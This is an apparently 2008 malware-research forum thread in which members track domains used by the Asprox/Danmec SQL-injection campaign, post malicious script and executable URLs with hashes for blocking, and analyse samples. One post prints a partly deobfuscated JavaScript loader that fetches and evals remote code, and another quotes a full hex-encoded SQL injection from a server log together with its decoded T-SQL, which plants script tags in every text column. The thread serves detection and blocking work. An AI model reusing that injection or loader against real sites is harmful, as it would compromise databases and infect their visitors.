hxxp://www.h-nan.net.cn/f115.swf
hxxp://www.h-nan.net.cn/f16.swf
hxxp://www.h-nan.net.cn/f28.swf
hxxp://www.h-nan.net.cn/f45.swf
hxxp://www.h-nan.net.cn/f47.swf
hxxp://www.h-nan.net.cn/i115.swf
hxxp://www.h-nan.net.cn/i16.swf
hxxp://www.h-nan.net.cn/i28.swf
hxxp://www.h-nan.net.cn/i45.swf
hxxp://www.h-nan.net.cn/i64.swf
hxxp://www.live322.cn/4561.swf
hxxp://www.live322.cn/4562.swf
hxxp://www.mvoe.cn/all/xmsl3.swf
hxxp://www.mvoe.cn/all/xmsl4.swf
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 05, 2008, 07:05:38 pm
Ref: mgfcompressors.com

Quote
thanks Steven,
we have deleted the files and asked again our client to move to another
platform for his web portal.

Feel free to send again mail if it happens again.
Regards
Bybit staff

There is something on the server which inserts a malicious script into the homepage on the first time you view it, as Bobby stated. And it seems like the same type of script which you saw inserted in /portal/help/.

Since you have spoken with them before and they said feel free to mail them if it happens again, what do you think the chances are of them taking a little look on the server and giving us the script which is causing this. I would be interested to see it.
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 05, 2008, 08:02:31 pm
I'll get in touch and find out :)
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 05, 2008, 11:58:28 pm
@Bobby,
I've got it decoded as far as the following, adding the vars as the errors borked on them, but it's now borking with an error telling me arguments.callee.toString() is null or not an object?

Code: [Select]
var FuqV=75397;
 var Z2Yh=73665;
 var xC=71163;
 var EjFO='KCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2BKC46KC7UeqKC71KCUeq6KC3BKCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2AKC78KC43KC3BKC76KC61KC72KC20KC6EKC4CKC6UeqKC6AKC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC78KC43KC3BKC76KC61KC72KC20KC76KC76KC3Vn0KC32KC3UeqKC37KC31KC30KC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC6EKC4CKC6UeqKC6AKC2AKC3UeqKC37KC37KC32KC3UeqKC3BKC76KC61KC72KC20KC4BKC4CKC3Vn0KC33KC30KC39KC3UeqKC32KC3B';
 eval(unescape(EjFO.replace(/Ueq/g,'5').replace(/KC/g,'%').replace(/Vn0/g,'D')));
 FuqV=FuqV+44051;
 
 var KL, vv, rz1, pv6x, nLej, xC, Mkmo='Fpo76Fpo61Fpo72Fpo20Fpo72Fpo7AFpo31Fpo3DFpo33Fpo30Fpo33Fpo34Fpo36Fpo3BFpo46Fpo75Fpo71Fpo56Fpo2DFpo2DFpo3BFpo76Fpo61Fpo72Fpo20Fpo44Fpo3DFpo27Fpo33Fpo35Fpo27Fpo3BFpo44Fpo3DFpo44Fpo2BFpo4BFpo4CFpo3B';
 eval(unescape(Mkmo.replace(/Fpo/g,'%')));
 Z2Yh=Z2Yh%KL;
 var Pv6c=80606;
 vv=vv+33901;
 var xEx=18390;
 var D;
 Pv6c=(Pv6c-79890)*(nLej-4095588384);
 FuqV=FuqV%Z2Yh;
 nLej=rz1+D;
 nLej=nLej+xEx;
 xC=(Pv6c-8575844471)*(vv-59581);
 D=xC%nLej;
 var Z3p='0dSmi460dSmi750dSmi710dSmi560dSmi3D0dSmi460dSmi750dSmi710dSmi560dSmixigY50dSmi440dSmi3B0dSmi760dSmi610dSmi7xigY0dSmixigY00dSmi650dSmi640dSmi6A0dSmi760dSmi3D0dSmi410dSmi480dSmi3B';
 eval(unescape(Z3p.replace(/ig/g,'z').replace(/0dS/g,'N').replace(/xzY/g,'2').replace(/Nmi/g,'%')));
 CvQ=new Array();
 var UEma;
 var mi;
 for(UEma=0;
 UEma<256;
 UEma++)
 {
   CvQ[UEma]=UEma;
 }
 mi=arguments.callee.toString();
 mi=mi.replace(/\W/g,'');
 mi=mi.toUpperCase();
 mi+=FuqV;
 var z2lP='cqe7ElcqeEl1cqe72cqe2Vcqe53cqe59cqeEl1cqe5cqeJ3DcqeEl5cqeEl4cqeElfcqe7Elcqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe54cqe7cqeJEl3cqe3Dcqe27cqe27cqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe75cqe41cqe3Dcqe31cqe3cqeJ33cqe3B';
 eval(unescape(z2lP.replace(/f/g,'A').replace(/V/g,'0').replace(/El/g,'6').replace(/cqe/g,'%').replace(/%J/g,'8%')));
 var oGZI;
 for(oGZI=0;
 oGZI<mi.length;
 oGZI++)
 {
   uA^=mi.charCodeAt(oGZI);
   if(oGZI%76==75)
   {
     Txc+=String.fromCharCode(uA);
     uA=183;
   }
   
 }
 if(oGZI%76!=75)
 {
   Txc+=String.fromCharCode(uA);
 }
 mi=Txc;
 var YL=null;
 var Cpw='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';
 var it='%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50';
 if (!YL)
 {
   try
   {
     YL=new XMLHttpRequest();
   }
   catch(e)
   {
     YL=null
   }
   ;
 }
 var ejA=unescape(Cpw);
 if (!YL)
 {
   try
   {
     YL=new ActiveXObject(ejA);
   }
   catch(e)
   {
     YL=null
   }
   
 }
 var zzl=unescape(it);
 if (!YL)
 {
   try
   {
     YL=new
     
     ActiveXObject(zzl);
   }
   catch(e)
   {
     YL=null
   }
   
 }
 var IOom=SYaX;
 var YH=function()
 {
   Oy = unescape(YL.responseText);
   var XT=0;
   var ZHev;
   for(Go=0;
   Go<256;
   Go++)
   {
     ZHev=Go%mi.length;
     ZHev=mi.charCodeAt(ZHev);
     var U;
U='9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g12B9A%g148%g165%g176%g13B9A%g148%g165%g176%g13D9894%g12B9A%g148%g165%g176%g13B9894%g13D9A%g148%g165%g176%g120%g125%g120%g132%g135%g136%g13B9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g13B%g143%g176919B%g147%g16F9D%g13D%g143%g176919B98949D%g13B%g143%g176919B98949D%g13D9A%g148%g165%g176%g13B';
     eval(unescape(U.replace(/%g/g,'M').replace(/M1/g,'%').replace(/9/g,'%5')));
   }
   qIpP=0;
   var BUBC;
   
   BUBC='daR45daR50daR45daR3DdaR30daR3BdaR76daR6B%daR72daR20daR7B%daR3DdaR27daR27daR3B';
   eval(unescape(BUBC.replace(/aR/g,'J').replace(/B%/g,'1').replace(/dJ/g,'%')));
   var RbLR;
   var RmmL;
   for(RbLR=0;
   RbLR<Oy.length;
   RbLR++)
   {
     qIpP=qIpP+1;
     var De;
De='G8N1G849G8N0G850G83DG8N1G849G8N0G850G825G832G835G836G83BG845G850G845G83DG845G850G845G82BG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG845G850G845G83DG845G850G845G825G832G835G836G83BG85AG848G865G8N6G83DG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG843G8N6G851G85BG8N1G849G8N0G850G85DG83DG843G8N6G851G85BG845G850G845G85DG83BG843G8N6G851G85BG845G850G845G85DG83DG85AG848G865G8N6G83BG852G86DG86DG84CG83DG843G8N6G851G85BG8N1G849G8N0G850G85DG82BG843G8N6G851G85BG845G850G845G85DG83BG852G86DG86DG84CG83DG852G86DG86DG84CG825G832G835G836G83BG852G86DG86DG84CG83DG843G8N6G851G85BG852G86DG86DG84CG85DG83BG852G86DG86DG84CG83DG84FG8N9G82EG863G868G861G8N2G843G86FG864G865G841G8N4G828G852G862G84CG852G829G85EG852G86DG86DG84CG83BG8N1G82BG83DG853G8N4G8N2G869G86EG86NG82EG866G8N2G86FG86DG843G868G861G8N2G843G86FG864G865G828G852G86DG86DG84CG829G83B';
     eval(unescape(De.replace(/N/g,'7').replace(/G8/g,'%')
     ));
   }
   eval(q);
 }
 ;var
 
 G=function()
 {
   if((YL.readyState==4)&&(YL.status==200))
   {
     YH();
   }
   
 }
 ;//YL.onreadystatechange=G;
 YL.open('GET',IOom,true);
 YL.send(null);

I added // before YL.onready.... just so it would go through with my manual script :) (manual script just over-rides document.write and eval so it dumps it to a file instead)
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 05, 2008, 11:59:32 pm
Btw, AntiVir is detecting my amended version as HTML/Crypted.Gen ...... which is a bit wierd as it completely ignored it prior to my modifying the script to correct the errors thrown by it ..
Title: Re: SQL Injected jscript sites
Post by: bobby on June 06, 2008, 05:30:41 am
Antnet gave here a complete solution for deobfuscating this one:
http://malware-research.co.uk/index.php?topic=8164.0
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 06, 2008, 05:34:04 am
Nice one, cheers :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 06, 2008, 01:53:45 pm
New:
kk6.us
hxxp://www.siteid38.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 06, 2008, 05:10:57 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on June 08, 2008, 12:34:52 am
<script src=hxxp://www.advertbnr.com/b.js></script>
<script src=hxxp://www.bannerupd.com/b.js></script>
<script src=hxxp://www.cookieadw.com/b.js></script>
<script src=hxxp://www.en-us18.com/b.js></script>
<script src=hxxp://www.refer68.com/b.js></script>
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 08, 2008, 07:54:11 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 11, 2008, 06:25:45 pm
Added:

hxxp://www.bigadnet.com
hxxp://www.fengnima.cn
hxxp://www.adsitelo.com
hxxp://www.advabnr.com
hxxp://www.qiqicc.cn

As a reminder, the full list I'm maintaining is at:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 11, 2008, 06:45:17 pm
Thank you YanceySlide.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on June 14, 2008, 05:06:55 am
hxxp://www.jetadwor.com/b.js
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 14, 2008, 06:48:02 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 18, 2008, 01:33:22 am
Google for:
Quote
iframe src=http://www.oiok01.net/s1.htm?
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 27, 2008, 05:55:12 am
Quote
src=http://www.clsiduser.com/b.js
src=http://www.domaincld.com/b.js
src=http://www.updatead.com/b.js

And the following ones...which in contrast with the above,
either they've just started injecting around,or they're older failed attempts...
Quote
src=http://www.app52.com/b.js
src=http://www.asp707.com/b.js
src=http://www.aspx49.com/b.js
src=http://www.aspssl63.com/b.js

Have a nice day...  :-*
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 27, 2008, 12:49:37 pm
Sorry, I haven't been updating this thread like I meant to. :(

The following are new as of today:
hxxp://www.adwste.mobi
hxxp://www.bnrupdate.mobi
hxxp://www.adupd.mobi

They're not yet being injected, but they are Danmec/Asprox domains.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 27, 2008, 05:06:59 pm
Four more:
hxxp://www.adwsupp.com
hxxp://www.hdadwcd.com
hxxp://www.kadport.com
hxxp://www.suppadw.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 27, 2008, 10:54:08 pm
Thank you :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 30, 2008, 05:21:42 pm
New:
hxxp://www.web923.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 30, 2008, 06:51:57 pm
Four more:
hxxp://www.csl24.com
hxxp://www.get49.net
hxxp://www.pid72.com
hxxp://www.pid76.net
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 30, 2008, 08:24:52 pm
Quote
src=http://www.j8j8hei.cn/k.js -> 235000 sites injected...

The following ones haven't been injected that much yet...
Quote
src=http://www.qq117cc.cn/k.js
src=http://www.qq117cc.cn/ri.js
src=http://www.batch29.com/b.js
src=http://www.dl251.com/b.js
src=http://www.supbnr.com/b.js
src=http://www.hlpgetw.com/b.js
src=http://www.rid34.com/b.js

And the following to be blocked as well...
Quote
hxxp://www.bdsae.org.cn/bdsae/aa.htm?11
hxxp://www.qq117cc.cn/456.htm
hxxp://www.qq117cc.cn/dj.htm
hxxp://bnrupdate.mobi/cgi-bin/index.cgi?ad
hxxp://pid76.net/cgi-bin/index.cgi?ad
hxxp://hdadwcd.com/cgi-bin/index.cgi?ad
hxxp://adupd.mobi/cgi-bin/index.cgi?ad
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 30, 2008, 08:44:46 pm
The following aren't resolving for me atm?

Code: [Select]
Error 9001 - Can't resolve host j8j8hei.cn
Error 9001 - Can't resolve host www.j8j8hei.cn
Error 9001 - Can't resolve host qq117cc.cn
Error 9001 - Can't resolve host www.qq117cc.cn
Error 9001 - Can't resolve host qq117cc.cn
Error 9001 - Can't resolve host www.qq117cc.cn
Error 9001 - Can't resolve host bdsae.org.cn
Error 9001 - Can't resolve host www.bdsae.org.cn
Error 9001 - Can't resolve host qq117cc.cn
Error 9001 - Can't resolve host www.qq117cc.cn
Error 9001 - Can't resolve host qq117cc.cn
Error 9001 - Can't resolve host www.qq117cc.cn
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 30, 2008, 08:51:04 pm
Heh,they have been rebooted for maintenance or something:
i tried 5 minutes ago and they were down,i tried 2 minutes ago,and they were up...
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 30, 2008, 08:55:11 pm
hehe ya gotta love 'em
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 30, 2008, 09:01:50 pm


Thanks, added the missing ones to my list.

I had been remiss in adding new entries here when I updated http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514 so several got added there that didn't show up here.  Sorry about that.
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 30, 2008, 09:06:28 pm
Lol no problem,here's another one for you  ;)
Quote
hxxp://www.maigol.cn/ri.js
Very fresh...google returns nada for the time being,he-he...
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 30, 2008, 09:14:35 pm
Lol no problem,here's another one for you  ;)
Quote
hxxp://www.maigol.cn/ri.js
Very fresh...google returns nada for the time being,he-he...

Added, thanks!
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 30, 2008, 09:41:16 pm
...is it my impression,or it seems like Google got fed up with the Asprox guys,
and decided to go...the "hard" way against them,he-he... 8)

Quote
src=http://www.j8j8hei.cn/k.js
-> Now it returns only 14300 results instead of 235000...
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 30, 2008, 11:20:44 pm
Thank you.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 01, 2008, 04:54:02 pm
...is it my impression,or it seems like Google got fed up with the Asprox guys,
and decided to go...the "hard" way against them,he-he... 8)

Quote
src=http://www.j8j8hei.cn/k.js
-> Now it returns only 14300 results instead of 235000...

Try querying some of the other "googles".  Like, google.co.uk or google.com.au or google.de.  I find I get different counts.  google.com has a more aggressive expiry.

Also, new domains this morning:
www.cntrl62.com
www.config73.com
www.default37.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 01, 2008, 05:25:37 pm
www.debug73.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 01, 2008, 09:13:13 pm
Thank you.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 02, 2008, 05:41:11 pm
Today's list:
www.canclvr.com
www.ktrcom.com
www.lokriet.com
www.mainbvd.com
www.portwbr.com
www.stiwdd.com
www.testwvr.com
www.ucomddv.com
www.upcomd.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 02, 2008, 08:23:25 pm
Thank you :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 03, 2008, 12:38:52 pm
New:
www.adwadb.mobi
www.allocbn.mobi
www.catdbw.mobi
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 03, 2008, 07:24:58 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on July 05, 2008, 02:19:55 pm
Quick'n'dirty list of sites and blogs that have recently posted lists of sql injection sites,
in case we've missed any of them...some of them are frequently updated as well:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
http://infosec20.blogspot.com/2008/06/asprox-sql-injection-botnet-and-iframe.html
http://s3cwatch.wordpress.com/

Ilion's blog is mentioned earlier in the thread...and ShadowServer's wiki obviously  :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 07, 2008, 12:42:50 pm
Ugh, this'll teach me to go away for vacation:
www.adbtch.com
www.aladbnr.com
www.apidad.com
www.appdad.com
www.asodbr.com
www.asslad.com
www.blcadw.com
www.blockkd.com
www.bnradd.mobi
www.bnrbasead.com
www.bnrbtch.com
www.browsad.com
www.brsadd.com
www.clrbbd.com
www.dbgbron.com
www.loctenv.com
www.mainadt.com
www.portadrd.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 08, 2008, 04:27:17 pm
New:
www.ausadd.com
www.ausbnr.com
www.crtbond.com
www.gbradw.com
www.usaadp.com
www.usaadw.com
www.usabnr.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 08, 2008, 04:34:14 pm
And:

www.destbnp.com
www.gbradp.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 08, 2008, 09:05:59 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 09, 2008, 03:09:59 pm
New:
www.adwnetw.com
www.bnsdrv.com
www.butdrv.com
www.cdrpoex.com
www.cliprts.com
www.drvadw.com
www.hdrcom.com
www.loopadd.com
www.movaddw.com
www.nopcls.com
www.pyttco.com
www.tctcow.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 09, 2008, 05:22:38 pm
New:
www.bkpadd.mobi
www.destad.mobi
www.porttw.mobi
www.tertad.mobi
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 11, 2008, 03:26:16 pm
Thank you.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 14, 2008, 02:27:48 pm
Only one new one (for now):
www.gitporg.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 14, 2008, 02:53:12 pm
Oh, hey, some non-asprox domains:
www.google9.info   
www.loveqianlai.cn
www.hiwowpp.cn
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 14, 2008, 07:41:24 pm
Meh, two more danmec/asprox:
www.addrl.com
www.adpzo.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 15, 2008, 12:25:17 pm
New danmec:
www.gbradde.tk
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 15, 2008, 07:36:31 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: spamislame on July 16, 2008, 03:31:13 pm
I noticed a couple things about these attacks now that a domain I control was recently hit with a variety of exploits (fortunately it's secure against all of them.)

- They only try one type of exploit at a time, and they only attempt it once.
- They use a different ip address for each attempt that they make, indicating that it's a distributed attack and seemingly automated.

The first attack attempted to exploit HORDE, a web mail client, using an outdated and assumedly unpatched version.

All other attacks (three so far) have focused on unpatched or outdated installs of WordPress.

The IP's appear to all be home internet accounts using cable or DSL connections, indicating that the storm infection is behind it (previously discussed, I am sure.)

fyi, if it helps.

SiL
Title: Re: SQL Injected jscript sites
Post by: Orac on July 17, 2008, 04:06:01 pm
Our log entry
Code: [Select]
***.***.***.*** - - [17/Jul/2008:08:13:32 +0000] "GET /forums/index.php?act=attach&type=post&id=125;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E75736572732E35312E6C612F323031363232322E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E75736572732E35312E6C612F323031363232322E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"
Decoded
Code: [Select]
DECLARE @S CHAR(4000);SET @S=CAST (DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://js.users.51.la/2016222.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://js.users.51.la/2016222.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor) AS CHAR(4000));EXEC(@S);

The link, js.users.51.la/2016222.js gives us
Code: [Select]
document.write ('<a href="http://www.51.la/?2016222" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a6222tf="51la";var a6222pu="";var a6222pf="51la";var a6222su=window.location;var a6222sf=document.referrer;var a6222of="";var a6222op="";var a6222ops=1;var a6222ot=1;var a6222d=new Date();var a6222color="";if (navigator.appName=="Netscape"){a6222color=screen.pixelDepth;} else {a6222color=screen.colorDepth;}<\/script><script>a6222tf=top.document.referrer;<\/script><script>a6222pu =window.parent.location;<\/script><script>a6222pf=window.parent.document.referrer;<\/script><script>a6222ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a6222ops=(a6222ops==null)?1: (parseInt(unescape((a6222ops)[2]))+1);var a6222oe =new Date();a6222oe.setTime(a6222oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a6222ops+ ";path=/;expires="+a6222oe.toGMTString();a6222ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a6222ot==null){a6222ot=1;}else{a6222ot=parseInt(unescape((a6222ot)[2])); a6222ot=(a6222ops==1)?(a6222ot+1):(a6222ot);}a6222oe.setTime(a6222oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a6222ot+";path=/;expires="+a6222oe.toGMTString();<\/script><script>a6222of=a6222sf;if(a6222pf!=="51la"){a6222of=a6222pf;}if(a6222tf!=="51la"){a6222of=a6222tf;}a6222op=a6222pu;try{lainframe}catch(e){a6222op=a6222su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2016222&tpages=\'+a6222ops+\'&ttimes=\'+a6222ot+\'&tzone=\'+(0-a6222d.getTimezoneOffset()/60)+\'&tcolor=\'+a6222color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a6222of)+\'&vpage=\'+escape(a6222op)+\'" \/>\');<\/script>');

The link in the above code, www.51.la/?2016222  gives us what looks like an automated regestration script
Code: [Select]
  <li><a href="reg.asp">申请</a></li>
  <li><a href="login.asp">登录</a></li>
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 17, 2008, 04:22:47 pm
New danmec:
www.adwr.ru
www.bnrc.ru
www.iogp.ru
www.lodse.ru
www.rrcs.ru
www.sdkj.ru
www.sslwer.ru
www.vcre.ru
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 17, 2008, 09:22:50 pm
New danmec:
www.adwbn.ru
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 19, 2008, 05:53:55 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on July 21, 2008, 02:16:47 am
<script src=hxxp://stoe.co.kr/img/btn/1.js></script>

<script src=hxxp://www.attadd.com/ngg.js></script>
<script src=hxxp://www.brcporb.ru/ngg.js></script>
<script src=hxxp://www.gb53.ru/ngg.js></script>
<script src=hxxp://www.korfd.ru/ngg.js></script>
<script src=hxxp://www.h23f.ru/ngg.js></script>
<script src=hxxp://www.lkc2.ru/ngg.js></script>
Title: Re: SQL Injected jscript sites
Post by: Orac on July 21, 2008, 04:54:54 pm
Code: [Select]
<script src="http://1.verynx.cn/w.js"></script>
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on July 21, 2008, 05:11:36 pm
Quote
hxxp://www.jvke.ru/ngg.js
hxxp://www.ecx2.ru/ngg.js
Pointing to:
hxxp://nudk.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.jex5.ru/ngg.js
Pointing to:
hxxp://gb53.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.5kc3.ru/ngg.js
hxxp://www.4cnw.ru/ngg.js
hxxp://www.keje.ru/ngg.js
hxxp://www.d5sg.ru/ngg.js
hxxp://www.90mc.ru/ngg.js
Pointing to:
hxxp://4cnw.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.btoperc.ru/ngg.js
hxxp://www.grtsel.ru/ngg.js
Pointing to:
hxxp://h23f.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.o1o2qq.cn/ri.js
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on July 22, 2008, 01:10:32 pm
Quote
hxxp://www.keec.ru/ngg.js
Pointing to:
hxxp://keje.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.9jsr.ru/ngg.js
Pointing to:
hxxp://5kc3.ru/cgi-bin/index.cgi?ad

Title: Re: SQL Injected jscript sites
Post by: JohnC on July 22, 2008, 03:10:52 pm
Thank you.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on July 24, 2008, 02:43:17 pm
<script src=hxxp://www.4vrs.ru/ngg.js></script>
<script src=hxxp://www.bts5.ru/ngg.js></script>
<script src=hxxp://www.cgt4.ru/ngg.js></script>
<script src=hxxp://www.chds.ru/ngg.js></script>
<script src=hxxp://www.cvsr.ru/ngg.js></script>
<script src=hxxp://www.kgj3.ru/ngg.js></script>
<script src=hxxp://www.lksr.ru/ngg.js></script>
<script src=hxxp://abc.verynx.cn/w.js></script>
Title: Re: SQL Injected jscript sites
Post by: Orac on July 24, 2008, 03:35:02 pm
Code: [Select]
<script src="http://abc.verynx.cn/w.js">
<script src="http://1.verynx.cn/w.js">
<script src="http://xunlei.verynx.cn/w.js">

Title: Re: SQL Injected jscript sites
Post by: JohnC on July 26, 2008, 05:45:28 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on August 06, 2008, 06:56:36 pm
Quote
hxxp://jjmaobuduo.3322.org/csrss/w.js
hxxp://jjmaoduo.3322.org/csrss/w.js
hxxp://www.8hcs.ru/js.js
hxxp://www.98hs.ru/js.js
hxxp://www.bgsr.ru/js.js
hxxp://www.bywd.ru/js.js
hxxp://www.ibse.ru/js.js
hxxp://www.ncbw.ru/js.js
hxxp://www.nwj4.ru/js.js
hxxp://www.ojns.ru/js.js
hxxp://www.porv.ru/js.js
hxxp://www.uhwc.ru/js.js

"Main" malware executable that gets dropped from some of the above...
(MD5 -> 68ba2b52c10841ea3d3e5d0982f647d8):
Quote
hxxp://www.plgou.com/csrss/rondll32.exe
And also...
Quote
hxxp://91.203.93.4/cgi-bin/index.cgi?ad
Title: Re: SQL Injected jscript sites
Post by: Serg on August 06, 2008, 11:06:15 pm
===
"Main" malware executable that gets dropped from some of the above...
(MD5 -> 68ba2b52c10841ea3d3e5d0982f647d8):
===

fukc... what is it? i've never seen that. Chines baidu.com, .ru sites and rootkits + unreachable admin page on 246.114.180.29:7854.... 
pls add this admin page
Code: [Select]
http://www.plgou.com/csrss/ack.html
and trojans from that
Code: [Select]
http://www.plgou.com/comine/sss.exe
http://www.plgou.com/comine/beauty.exe
http://www.plgou.com/comine/sl.exe
http://www.plgou.com/comine/server.exe
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on August 06, 2008, 11:34:12 pm
Regarding the dropped rondll32.exe above...
http://s3cwatch.wordpress.com/2008/08/06/

Didn't really bothered digging more on the dropped exes to be honest,
spent more time trying to dig newer "injection" domains per se...

Edit:Thought i should add the hashes from the rest of .exes as well...
Quote
846790691B6F9717B9A1BF68E0BCD6E5 -> sss.exe
C1D6F2020EA16FA73CF70F522A7ECFD6 -> beauty.exe
82686A1AB42882AE0E40B863E79E6E33  -> sl.exe
526FEEE3909E18DB7D8AA567019B7C2C -> server.exe
Title: Re: SQL Injected jscript sites
Post by: Orac on August 07, 2008, 11:11:54 am
One from todays logs on one of our servers

Log entry, IP address obfuscated for privacy.
Code: [Select]
